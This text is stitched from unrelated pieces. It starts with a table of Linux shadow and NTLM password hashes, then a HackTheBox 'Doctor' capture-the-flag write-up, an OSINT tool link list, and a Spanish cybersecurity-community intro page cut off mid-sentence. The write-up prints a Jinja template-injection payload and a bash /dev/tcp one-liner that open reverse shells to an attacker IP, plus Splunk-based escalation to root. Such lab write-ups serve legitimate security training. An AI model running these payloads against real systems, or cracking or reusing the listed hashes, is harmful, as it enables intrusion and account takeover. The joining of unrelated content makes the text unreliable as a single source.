`setup:$6$PR5zOqWk$3MKXMgf6.4bLlznh0R87RB4qaOAcGhbE0Cs8xtUqVPHP8x0553/6aMZnfsZOWKXL0DOqUcVRkfCQN8DvjdZNc1:17086:0:99999:7:::` | | 80. | `shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::` | | 81. | `smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::` | | 82. | `SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::` | | 83. | `susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::` | | 84. | `sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::` | | 85. | `togie:$6$dvOTOc6x$jpt1MVPeBsVlfkhVXl3sv21x2Ls2qle8ouv/JMdR6yNpt2nHHahrh0cyT.8PfVcNqlrAHYFkK2WYdSbxQ4Ivu1:17392:0:99999:7:::` | | 86. | `tom:$6$ptD/.gN.$n.B/5dODEQFteBwg75Ip9leeaaXSMesGbfZzoVHpZihMHfbWu45UpVZTc6razK1JLZ6817ckZhAJF776Dg/ZJ0:17407:0:99999:7:::` | | 87. | `user1:$6$9iyn/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::` | | 88. | `user2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs/MNAmmPeudsz/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::` | | 89. | `user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::` | | 90. | `user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::` | | 91. | `user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7:::` | | 92. | `user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7:::` | | 93. | `user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::` | | 94. | `user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::` | | 95. | `user:$6$gLVDPSY5$CGHDuEBpkC90vX2xFD9NeJC0O9XfhVj9oFVvL8XbTRpBnt/7WJFpADj0zboPTKTqPbOHafZGUd/exj4OZ1Frc/:15585:0:99999:7:::` | | 96. | `veronica:$6$ud4650Og$j9dN4Xh6nHTDUQ5LpnrUzl6FdRiapcGvjg0JU2/Wx.G5Q.PFtbv.sa4OJyNnzTVsFEMmgnEZQV1nxGFiy56zS/:17033:0:99999:7:::` | | 97. | `vulnix:$6$tMOyhDF2$gExhASDVWJqHYn00.A8XLJb.DvE7bdD6NffAno3iY5zEkJwZ4yDTGMrhdVbkMXV1dlBT00DoGFR7oXbtDi3lQ0:15585:0:99999:7:::` | | 98. | `wpadmin:$6$FtTN/YPC$iidNFmRVpQ1p2kkfoOZ6OzNPqR95DQ/7G10aze2CA2W3ik/sHHyEPaNNY57tMvRDU0/Rs62FEimiKXD2VgEYC1:17096:0:99999:7:::` | | 99. | `www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::` |
# Doctor: 10.10.10.209 ## Hints - Find a hostname which has a different web application - The machine category tags state SSTI, this is important info to know, so put it in you brain "archive" - Privesc to another user involves looking at group file ownership and passwords in log files - Privesc to root involves a unique service running as root ## nmap Starting with the usual `nmap` scan. Interesting ports: ```none 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 8089/tcp open ssl/http Splunkd httpd ``` Looks like an Ubuntu Focal (20.04) system with SSH and HTTP (Apache). There is also port 8089 open which seems to have SSL and a unique piece of software called Splunkd. I have a quick poke a Splunkd, and did some research, but it seems we need creds to do anything on this server - and the version is quite up-to-date without many exploits. So, as usual, starting with enumerating web. ## 80: Recon Borwsing to the website on port 80 we can see some health care provider infromation. ![80 Home](screenshots/80_home.png) There is a hostname leak for `doctors.htb` so I added it to the `/etc/hosts` file. Apart from that, there is a list of doctor names, and some updates made by what seems to be an "Admin" account. Not much else going on, so fired up a `gobuster` with the normal arguments. ```none gobuster dir -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u 10.10.10.209 -o logs/gobuster_80_root_medium.log ``` Browsing to the `doctors.htb` hostname, we are greeted by a "Doctor Secure Messaging" application that requires login. ![80 Doctors](screenshots/80_doctors.png) The interesting thing about this page was it seemed to be running from a different webserver, using Python3 Werkzeug. We can see this information in the HTTP reponse headers from the server. ```none └─$ curl -s -o /dev/null -D - doctors.htb HTTP/1.1 302 FOUND Date: Sat, 25 Sep 2021 19:25:47 GMT Server: Werkzeug/1.0.1 Python/3.8.2 Content-Type: text/html; charset=utf-8 Content-Length: 237 Location: http://doctors.htb/login?next=%2F Vary: Cookie Set-Cookie: session=eyJfZmxhc2hlcyI6W3siIHQiOlsiaW5mbyIsIlBsZWFzZSBsb2cgaW4gdG8gYWNjZXNzIHRoaXMgcGFnZS4iXX1dfQ.YU93uw.UzZXlTRCqnO0NAbMiZoQ012GZ20; HttpOnly; Path=/ ``` Started a `gobuster` on the newly discovered webserver with the usual options to have some automated enumeration in the background. I tried a couple of common username and password combinations - but didn't have any luck. Then tried some SQL injection attacks, but the page did not seem vulnerable. Next, I tried the "Forgot Password" page (`http://doctors.htb/reset_password`), which revealed if a supplied email was correct or not. This could be useful to guess usernames (emails). However, after manually trying a bunch of potential email addresses, I decided to move on. I noticed there was also an option to register an account, so went ahead and did that. Interestingly, the account was only valid for 20 minutes. > Your account has been created, with a time limit of twenty minutes! At this point, looked at the `gobuster` results and compared them to the links on the website after being logged in. Most of the paths in the results were present, apart from `archive` - which seemed to be an RSS feed of the site for the current user only. ## SSTI to RCE At this point, I knew I should try Server Side Template Injection (SSTI) - but only because the SSTI category was provided in the HTB interface for this machine. I hadn't done much SSTI before, so I had a look at the [HackTricks SSTI (Server Side Template Injection) article](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection). After reading through some information, I looked at the SSTI methodology flow chart, which helps identify which templating library is being used, without seeing the code. The idea - enter a bunch of math equations into user input, and see what renders, or calculates, instead of printing the literal string. ![80 Doctors](screenshots/ssti_methodology.png) I tried entering in a couple SSTI payloads, and didn't get any results. The payload was just printed out exactly had I entered it. ![80 SSTI Test](screenshots/80_doctors_ssti_1.png) After getting a little nudge from a friend, I realised that you needed to view the `http://doctors.htb/archive` page to get the injected template to render, and it would only be visible when viewing the source code of the page. In the folloiwng screenshot, we can see that the `{{7*7}}` payload is executed, and 49 is printed out. Another important note, only the message title is included on the `archive` page. ![80 SSTI Test](screenshots/80_doctors_ssti_2.png) Based on the results and some more testing, it seems we had the Jinja templating library. Luckily, there is a [HackTricks section on Jinja](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python) with some useful payloads. I tried a couple of the payloads, such as reading files. But they kept crashing the server and making it reutrn a 500 error. When this happened, I had to make a new account. After some trial and error, I got a RCE payload to work - the payload uses the `subprocess` module to open a shell. I got this from the HackTricks article, but had to modify the `subprocess` call. ```none {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %} ``` ![80 SSTI Test](screenshots/80_doctors_ssti_3.png) After browsing to the archive page, the payload was triggered and got a reverse shell. ```none └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.10.209] 46040 bash: cannot set terminal process group (823): Inappropriate ioctl for device bash: no job control in this shell web@doctor:~$ id id uid=1001(web) gid=1001(web) groups=1001(web),4(adm) ``` This process was quite difficult for someone new to SSTI and required lots of trial and error to get code execution. For anyone reading this, I basically just read the HackTricks article from start to end, trying different payloads. I think I created about 20 accounts on the web application trying to get a shell! Try harder I guess?! ## Privesc: `web` to `shaun` Started running linpeas in the background for some automated enumeration. The first thing I noticed was that the `web` user was in a group called `adm`. ```none User & Groups: uid=1001(web) gid=1001(web) groups=1001(web),4(adm) ``` There are a few users in the box with a shell, but it seems like elevating to `shaun` would be the most likely next step. Mainly because `shaun` has the user flag in their home directory. ```none [+] Users with console root:x:0:0:root:/root:/bin/bash shaun:x:1002:1002:shaun,,,:/home/shaun:/bin/bash splunk:x:1003:1003:Splunk Server:/opt/splunkforwarder:/bin/bash web:x:1001:1001:,,,:/home/web:/bin/bash ``` I tried dumping the Splunkd password file, but we do not have access. ```none cat /opt/splunkforwarder/etc/passwd cat: /opt/splunkforwarder/etc/passwd: Permission denied ``` I didn't find much else in the linpeas output. So I started to look at all the files that have `adm` as the group. ```none # Find all files with adm group ownership find / -group adm 2>/dev/null # Exclude files in /proc find / -group adm 2>/dev/null | grep -v proc ``` There were a bunch of log files in the results. I stated doing some more searching for some keywords such as `shaun` and `password`. ```none find / -group adm -exec grep 'shaun' {} \; 2>/dev/null find / -group adm -exec grep 'password' {} \; 2>/dev/null ``` After a while I found that the `/var/log/apache2/backup` file has an interesting entry from a user who attempted to reset their password. Looks like the user entered their password into the form, instead of their email! ```none /var/log/apache2/backup:74:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password" ``` With this password, tried switching to the `shaun` user. ```none web@doctor:~$ su - shaun su - shaun Password: Guitar123 id uid=1002(shaun) gid=1002(shaun) groups=1002(shaun) wc -c /home/shaun/user.txt 33 /home/shaun/user.txt ``` Success! Got the user flag. I also tried to SSH into the machine by specifying the `shaun` user and the password we got. However, got denied... which is interesting. Turns out that `shaun` is denied access via SSH in the config file: `DenyUsers shaun`. This was probably a good idea from the machine creator, as the `Guitar123` password was in rockyou. ## Privesc: `shaun` to `root` Started running linpeas in the background while having a look around the system. One of the first things of interested I noted was the Splunkd service was running as root. ```none root 1134 0.1 2.1 257468 86816 ? Sl 21:24 0:05 splunkd -p 8089 start ``` At the start of this machine, I had a feeling that this service would have a purpose, but needed credentials to perform any sort of attack. I navigated to the web application and tried logging in with the only credentials we had: `shaun:Guitar123`. ```none https://10.10.10.209:8089/services ``` And we have access to a bunch more options. I had a read of the [HackTricks article on Splunk LPE and Persistence](https://book.hacktricks.xyz/linux-unix/privilege-escalation/splunk-lpe-and-persistence) which outlined how to use a Python tool, named [SplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2), to get remote code execution. I cloned the project repo: ```none git clone https://github.com/cnotin/SplunkWhisperer2.git ``` This tool requires a lot of arguments, but the most important is the payload. The HackTricks article had a couple examples that added a root user. Since Splunkd was running as `root` on this machine, I decided to use a simple Bash reverse shell as the payload. ```none python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --lhost 10.10.14.2 --lport 9002 --username shaun --password Guitar123 --payload "bash -c 'bash -i >& /dev/tcp/10.10.14.2/9001 0>&1'" ``` The executed the tool. ```none [.] Authenticating... [+] Authenticated [.] Creating malicious app bundle... [+] Created malicious app bundle in: /tmp/tmpxtqyxmqy.tar [+] Started HTTP server for remote mode [.] Installing app from: http://10.10.14.2:9002/ 10.10.10.209 - - [26/Sep/2021 09:39:35] "GET / HTTP/1.1" 200 - [+] App installed, your code should be running now! Press RETURN to cleanup ``` Made sure to have a netcat listener, and got a connection back as the `root` user. ```none └─$ nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.10.209] 57702 bash: cannot set terminal process group (1136): Inappropriate ioctl for device bash: no job control in this shell root@doctor:/# id id uid=0(root) gid=0(root) groups=0(root) root@doctor:/# wc -c /root/root.txt wc -c /root/root.txt 33 /root/root.txt ``` Done! ## Lessons Learned - Take time to read. I almost missed `doctors.htb` and I read it as `doctor.htb` - Been a while since I didn't do a decent enumeration on a machine, but made a few mistakes on this machine. Enumerate! ## Useful Resources - [HackTheBox - Doctor by ippsec](https://www.youtube.com/watch?v=JcOR9krOPFY) - [HTB: Doctor by 0xdf](https://0xdf.gitlab.io/2021/02/06/htb-doctor.html)
# Open-source Intelligence (OSINT) Open-source intelligence (OSINT) is data collected from open source and publicly available sources. The following are a few OSINT resources and references: ## Passive Recon Tools: - [AMass](https://github.com/OWASP/Amass) - [Deepinfo (commercial tool)](https://deepinfo.com) - [Exiftool](https://www.sno.phy.queensu.ca/~phil/exiftool/) - [ExtractMetadata](http://www.extractmetadata.com) - [Findsubdomains](https://findsubdomains.com/) - [FOCA](https://elevenpaths.com) - [IntelTechniques](https://inteltechniques.com) - [Maltego](https://www.paterva.com/web7/) - [Recon-NG](https://github.com/lanmaster53/recon-ng) - [Scrapy](https://scrapy.org) - [Screaming Frog](https://www.screamingfrog.co.uk) - [Shodan](https://shodan.io) - [SpiderFoot](http://spiderfoot.net) - [theHarvester](https://github.com/laramies/theHarvester) - [Visual SEO Studio](https://visual-seo.com/) - [Web Data Extractor](http://www.webextractor.com) - [Xenu](http://home.snafu.de) - [ParamSpider](https://github.com/devanshbatham/ParamSpider) ## Open Source Threat Intelligence - [GOSINT](https://github.com/ciscocsirt/gosint) - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence. - [Awesome Threat Intelligence](https://github.com/santosomar/awesome-threat-intelligence) - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it. ### Website Exploration and "Google Hacking" - censys : https://censys.io - Certficate Search: https://crt.sh/ - ExifTool: https://www.sno.phy.queensu.ca/~phil/exiftool - Google Hacking Database (GHDB): https://www.exploit-db.com/google-hacking-database - Google Transparency Report: https://transparencyreport.google.com/https/certificates - Huge TLS/SSL certificate DB with advanced search: https://certdb.com - netcraft: https://searchdns.netcraft.com - SiteDigger: http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx - Spyse: https://spyse.com ### Data Breach Query Tools - BaseQuery: https://github.com/g666gle/BaseQuery - Buster: https://github.com/sham00n/buster - h8mail: https://github.com/khast3x/h8mail - LeakLooker: https://github.com/woj-ciech/LeakLooker - PwnDB: https://github.com/davidtavarez/pwndb - Scavenger: https://github.com/rndinfosecguy/Scavenger - WhatBreach: https://github.com/Ekultek/WhatBreach ### IP address and DNS Lookup Tools - [bgp](https://bgp.he.net/) - [Bgpview](https://bgpview.io/) - [DataSploit (IP Address Modules)](https://github.com/DataSploit/datasploit/tree/master/ip) - [Domain Dossier](https://centralops.net/co/domaindossier.aspx) - [Domaintoipconverter](http://domaintoipconverter.com/) - [Googleapps Dig](https://toolbox.googleapps.com/apps/dig/) - [Hurricane Electric BGP Toolkit](https://bgp.he.net/) - [ICANN Whois](https://whois.icann.org/en) - [Massdns](https://github.com/blechschmidt/massdns) - [Mxtoolbox](https://mxtoolbox.com/BulkLookup.aspx) - [Ultratools ipv6Info](https://www.ultratools.com/tools/ipv6Info) - [Viewdns](https://viewdns.info/) - [Umbrella (OpenDNS) Popularity List](http://s3-us-west-1.amazonaws.com/umbrella-static/index.html) ### Social Media * [A tool to scrape LinkedIn](https://github.com/dchrastil/TTSL) * [cree.py](https://github.com/ilektrojohn/creepy) ### Acquisitions and - [OCCRP Aleph](https://aleph.occrp.org/) - The global archive of research material for investigative reporting. ### Whois WHOIS information is based upon a tree hierarchy. ICANN (IANA) is the authoritative registry for all of the TLDs and is a great starting point for all manual WHOIS queries. - ICANN: http://www.icann.org - IANA: http://www.iana.com - NRO: http://www.nro.net - AFRINIC: http://www.afrinic.net - APNIC: http://www.apnic.net - ARIN: http://ws.arin.net - LACNIC: http://www.lacnic.net - RIPE: http://www.ripe.net ### BGP looking glasses - BGP4: http://www.bgp4.as/looking-glasses - BPG6: http://lg.he.net/ ### DNS - dnsenum - https://code.google.com/p/dnsenum - dnsmap: https://code.google.com/p/dnsmap - dnsrecon: https://www.darkoperator.com/tools-and-scripts - dnstracer: https://www.mavetju.org/unix/dnstracer.php - dnswalk: https://sourceforge.net/projects/dnswalk ## The OSINT Framework - [OSINT Framework](https://osintframework.com) ## Dark Web OSINT Tools ### Dark Web Search Engine Tools - [Ahmia Search Engine](https://ahmia.fi) and [their GitHub repo](https://github.com/ahmia/ahmia-site) - [DarkSearch](https://darksearch.io) and their [GitHub repo](https://github.com/thehappydinoa/DarkSearch) - [Katana](https://github.com/adnane-X-tebbaa/Katana) - [OnionSearch](https://github.com/megadose/OnionSearch) - [Search Engines for Academic Research](https://www.itseducation.asia/deep-web.htm) - [DarkDump](https://github.com/josh0xA/darkdump) ### Tools to Obtain Information of .onion Links - [H-Indexer](http://jncyepk6zbnosf4p.onion/onions.html) - [Hunchly](https://www.hunch.ly/darkweb-osint) - [Tor66 Fresh Onions](http://tor66sewebgixwhcqfnp5inzp5x5uohhdy3kvtnyfxc2e5mxiuh34iid.onion/fresh) ### Tools to scan onion links - [Onioff](https://github.com/k4m4/onioff) - [Onion-nmap](https://github.com/milesrichardson/docker-onion-nmap) - [Onionscan](https://github.com/s-rah/onionscan) ### Tools to Crawl Dark Web Data - [TorBot](https://github.com/DedSecInside/TorBot) - [TorCrawl](https://github.com/MikeMeliz/TorCrawl.py) - [OnionIngestor](https://github.com/danieleperera/OnionIngestor) ### Other Great Intelligence Gathering Sources and Tools - Resources from Pentest-standard.org - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Intelligence_Gathering ### Active Recon - Tons of references to scanners and vulnerability management software for active reconnaissance - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Vulnerability_Analysis
# Introducción | :warning: Si nos visitas desde un dispositivo móvil, en las tres rayas horizontales en la parte superior izquierda puedes desplegar el menú lateral para acceder a todo el contenido. | --- | ## La Comunidad ProtAAPP ProtAAPP es una **comunidad** que surgió en 2018 y que integra a profesionales de las Administraciones Públicas con un denominador común: su pasión por la ciberseguridad. ProtAAPP persigue un triple objetivo: - Permitir la compartición de ideas, experiencias, nuevos proyectos, propuestas de colaboración, etc., en materia de ciberseguridad dentro del sector público. - Facilitar el establecimiento de contactos y el conocimiento de otros profesionales con las mismas inquietudes y a los que poder acudir, o con los que poder colaborar. - Ofrecer un foro de conocimiento a través del que continuar aprendiendo en múltiples sectores relacionados con la ciberseguridad: normativo, técnico, organizativo, etc. Para hacer todo esto posible, la comunidad dispone, entre otras herramientas, de la [web](https://www.protaapp.com), a través de la que se da a conocer la comunidad y se divulga conocimiento de forma pública para todos los interesados, así como de una lista de distribución privada con múltiples temáticas, a través de la que los miembros de la comunidad realizan propuestas, debaten, consultan por experiencias similares en otros organismos, estrechan lazos, organizan quedadas y ejercitan a diario sus conocimientos sobre ciberseguridad. **¿Te interesa formar parte de nuestra comunidad?** ¿Quieres ayudarnos a conseguir que nuestras Administraciones Públicas dispongan de un gran equipo de profesionales cualificados, comunicados y cohesionados?, ¿y que podamos ofrecer un servicio público más seguro para los ciudadanos?, ¿y, por supuesto, disfrutar de toda esta experiencia? ::: tip Entra en la comunidad No lo dudes, escríbenos a [info@protaapp.com](info@protaapp.com), ¡te esperamos! ::: Síguenos en: - [Twitter](https://twitter.com/protaapp) - [www.protaapp.com/](https://www.protaapp.com/) - [LinkedIn](https://www.linkedin.com/company/protaapp/) - [Github](https://github.com/ProtAAPP) - [Grupo de Google](https://groups.google.com/group/ProtAAPP) - Correo electrónico: [info@protaapp.com](mailto:info@protaapp.com) ### Colabora en la difusión de ProtAAPP Si ya eres miembro, siéntete libre de utilizar nuestras [infografías](https://www.protaapp.com/p/blog-page.html) con la imagen de la comunidad en: - Asistencia a seminarios, jornadas o congresos de seguridad. - Sesiones de formación o confirmación. - Documentación y propuestas. ::: tip ¿A qué estás esperando? Quizá tienes una idea pero no te atreves a ponerla en práctica de forma individual. Ningún problema. Compártelo con la comunidad. Seguro que alguien se anima contigo. ::: Si no puedes ser miembro, también puedes contactar con nosotros para proponer la participación en alguna de las anteriores o cualquier otra iniciativa interesante. No dudes en contactar con nosotros y si se ajusta a los objetivos de la comunidad, intentaremos ponerte en contacto con miembros que puedan estar interesados. ### Participaciones y actividades de la comunidad #### 2018 - (24/05) SocInfo [Elige tu propia aventura - La incidencia de seguridad](https://www.slideshare.net/GuillermoObispoSanRo/elige-tu-propia-aventura-la-incidencia-de-seguridad) #### 2019 - (29/01) CyberCamp [Del rojo al azul](https://www.youtube.com/watch?v=WiQ1zknX-rU) - (06/02) SocInfo [Accesos corporativos. Instrucciones de montaje (DIY)](https://www.slideshare.net/GuillermoObispoSanRo/accesos-corporativos) - (22/02) ElDiablu (la precuela) - (13/03) Un hacker al día - Programa #Include/Fundación GoodJob - (29/03) RootedCon [Zarancon City: Ciudad bastionada](https://www.youtube.com/watch?v=VJIzFuTTRb4) - (13/12) ElDiaBlu I #### 2020 - (30/01) Isaca [Menú saludable para Responsables de Seguridad. Como digerir el ENS](https://www.slideshare.net/GuillermoObispoSanRo/menu-saludable-para-responsables-de-seguridad-226454626) - (05/03) RootedCon [La Metacharla de Seguridad](https://www.youtube.com/watch?v=laRfJ_zYJBI) - (07/03) RootedCon [Compliance as Code (Auditoría de infraestructura, rápida y eficiente)](https://www.youtube.com/watch?v=vODFljdavJw&t=1s) - (19/05) Un hacker al día - Programa #Include2/Fundación GoodJob - Mayo - (07/10) Un hacker al día - Programa #Include/Fundación GoodJob - (31/10) C1b3rWall Academy [Cimientos sólidos para Defensores](https://www.youtube.com/watch?v=hmaMOKSjw-U) - (27/11) ElDiaBlu II - (18/12) #NochedeGuasAAPP v1, [VIDEO](https://www.youtube.com/watch?v=Sh4Ujqs2n7Y&t=1) #### 2021 - (23/04) #NochedeGuasAAPP v2 [VIDEO](https://youtu.be/lUwAQTu1Dyw) - (18/03) Un hacker al día - Programa #Include/Fundacion GoodJob - (25/05) SocInfo [In the navy. Hasta la DMZ y más allá](https://www.slideshare.net/GuillermoObispoSanRo/in-the-navy-hasta-la-dmz-y-ms-all) - (22/07) [Nuevas tendencias y plataformas: Youtube, Twitch y Ciberseguridad](https://www.youtube.com/watch?v=fFtCZy6iUlA) - Universidad Europea de Madrid #### 2022 - (11/03) Track de ProtAAPP en [RootedCON](https://rootedcon.com) - (17/03) Un hacker al día - Programa #Include/Fundacion GoodJob - (11/10) II Congreso Nacional RECI - [Zaracón, ciudad bastionada Parte II] (Palma de Mallorca) - (15/10) [TizonaConf](https://www.tizonaconf.com/) [Zaracón, ciudad bastionada Parte II] (Burgos) - (23/11) MICE Forum (Sevilla) #### 2023 - (13/02) Participación en el [Twitch de Securiters](https://www.twitch.tv/videos/1737232268) de Miguel Angel Rodriguez - (10/03) Track de ProtAAPP en el congreso [RootedCON](https://rootedcon.com) * Presentación de Marta Beltrán: [Nuevos (y viejos) enfoques para la gestión de identidades y accesos](https://mbelpar.github.io/files/talks/mbeltran%20Rooted%202023%20publica.pdf) * Presentación de Julia Cortés: [¿Realmente somos las personas el eslabón mas débil de la cadena?](https://github.com/ProtAAPP/ProtAAPP-RootedCON/blob/07348586ee5307f2d8550fda57f2332274c606a7/2023/2023-ProtAAPP-RootedCON-JuliaCortesDelgado.pdf) * Presentación de Maribel González: [Criptografía Post-Cuántica (para muggles)](https://github.com/ProtAAPP/ProtAAPP-RootedCON/blob/e7cde26109eaa05433c786cace92f75ae69283d3/2023/2023-ProtAAPP-RootedCON-MaribelGonzalezVasco.pdf) * Presentación de Ángel del Peso: [¿Montar un ministerio? Sujet me the cubat](https://github.com/ProtAAPP/ProtAAPP-RootedCON/blob/05a5b8b3f7a8798107be5b8723631c80e893f89b/2023/2023-ProtAAPP-RootedCON-AngeldelPeso.pdf) * Presentación de Emilio Rico: [¡Ven a la escuela de calor! (#mitreando)](https://github.com/ProtAAPP/ProtAAPP-RootedCON/blob/05a5b8b3f7a8798107be5b8723631c80e893f89b/2023/2023-ProtAAPP-RootedCON-EmilioRico.pdf) * Presentación de Lorena González [¿Y si conozco lo que tecleas? Un estudio de viabilidad](https://github.com/ProtAAPP/ProtAAPP-RootedCON/blob/05a5b8b3f7a8798107be5b8723631c80e893f89b/2023/2023-ProtAAPP-RootedCON-LorenaGonzalezManzano.pdf) * Presentación de Francisco Hernández Cuchí [Robin de los PINTXOS](https://github.com/ProtAAPP/ProtAAPP-RootedCON/blob/bb94ade533a794a2cdda9d1bf7331294efdb5258/2023/2023-ProtAAPP-RootedCON-FranciscoHernandezCuchi.pdf) * Presentación de Blanca Muñoz [Una aproximación técnica a la privacidad: la k-anonimización](https://github.com/ProtAAPP/ProtAAPP-RootedCON/blob/a7449331522acc6474f79a63331c5be49fa8ccbb/2023/2023-ProtAAPP-RootedCON-BlancaMunoz.pdf) - (15/03) Congreso [TryitUPM](https://congresotryit.es/) ["Del rojo al azul v2"](https://www.twitch.tv/videos/1765715380?t=3h30m25s) - (18/05) Finalistas OpenAwards 2023 en la categoría [Comunidad Tecnológica] - (19/06) Cybercamp UC3M [Lo primero de todo... ¿cómo están los máquinas?](https://www.youtube.com/watch?v=mYxRqKlQMZI) - (22/06) XVI Premio Red Seguridad a la [Capacitación, Divulgación, Concienciación o Formación en Seguridad TIC](https://www.redseguridad.com/actualidad/ciberseguridad/los-xvi-trofeos-de-la-seguridad-tic-ya-tienen-ganadores-conoce-todos-ellos_20230606.html) - (29/06) Lo de los Hackers |3x10| [Entrevista a Willy](https://www.youtube.com/watch?v=-qrB-XHJnWo&t=4s) ## Colabora con esta documentación Este repositorio está (y estará siempre) **"en construcción"**, ya que el conocimiento en esta materia está en continua evolución. Por esta razón, si tienes conocimientos de cualquier ámbito de la ciberseguridad, te animamos a participar en el desarrollo de este repositorio de documentación. Está construido a base de ficheros de texto plano en formato [markdown](https://markdown.es/) y las contribuciones se controlan mediante el repositorio git, en [GitHub](https://github.com/). Este repositorio de documentación está construido con la librería [Vuepress](https://vuepress.vuejs.org/). El código fuente de este repositorio se encuentra en github: [ProtAAPP/wikiprot](https://github.com/ProtAAPP/wikiprot). Consulta el [código de conducta](https://github.com/ProtAAPP/wikiprot/blob/master/code_of_conduct.md) y la [guía para contribuir](https://github.com/ProtAAPP/wikiprot/blob/master/code_contribution_guideline.md) ### Requisitos Los requisitos para poder colaborar en el desarrollo de esta guía son: 1. Pertenecer al colectivo de empleados públicos de las Administraciones Públicas españolas (funcionarios, laborales, etc) 2. Tener conocimientos básicos de git ([guía básica](https://medium.com/@sthefany/primeros-pasos-con-github-7d5e0769158c)) 3. Tener conocimientos básicos de markdown (muy muy sencillo, [aprende lo básico en 3 minutos](./requisitos-colaborar.md#aprender-markdown-en-3-minutos)) 4. Instalar [git](https://git-scm.com/downloads) en tu PC *(ó editar directamente en Github)* 5. Instalar Node en tu PC ([explicación más detallada](./requisitos-colaborar.md#instalar-node)) 6. Instalar yarn ([cómo hacerlo en 10 segundos](./requisitos-colaborar.md#instalar-yarn)) 7. Abrirte cuenta en Github ([crear cuenta en Github](https://github.com/join?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F&source=header-home)) 8. Ya estás listo para insertar tu primera aportación. | :warning: La siguiente sección es sólo para novatos, si ya eres un maestro Jedi en esto de git salta a [Para avezados](./readme.md#para-avezados). | --- | ### Para novatos (como si estuvieras en primero) Recuerda que has de tener cuenta en Github (es gratis) para poder subir código. Aquí tienes el enlace para [crear cuenta en Github](https://github.com/join?ref_cta=Sign+up&ref_loc=header+logged+out&ref_page=%2F&source=header-home) En caso en que sea la primera vez que oyes esto de Git y Github, esta es la manera más sencilla de colaborar vía web. En el siguiente vídeo puedes ver cómo hacerlo: [![Como colaborar en la wikiprot como si estuvieras en primero](../../assets/screenshot-video.jpg)](https://youtu.be/Se7wAVhNBeQ "Como colaborar en la wikiprot como si estuvieras en primero") 1. Abre en el navegador [Repositorio de WikiProt](https://github.com/ProtAAPP/wikiprot) 2. Selecciona la rama "master". 3. Navega por el código hasta que encuentres el fichero que quieres modificar. 4. Editalo pulsando sobre el lápiz, si no tienes hecho login, te lo pedirá y una vez logueado ya puedes añadir o modificar. 5. Una vez que hayas terminado, añade un comentario al final y haz un "Propose Changes". 6. Comprobamos lo que se ha modificado y 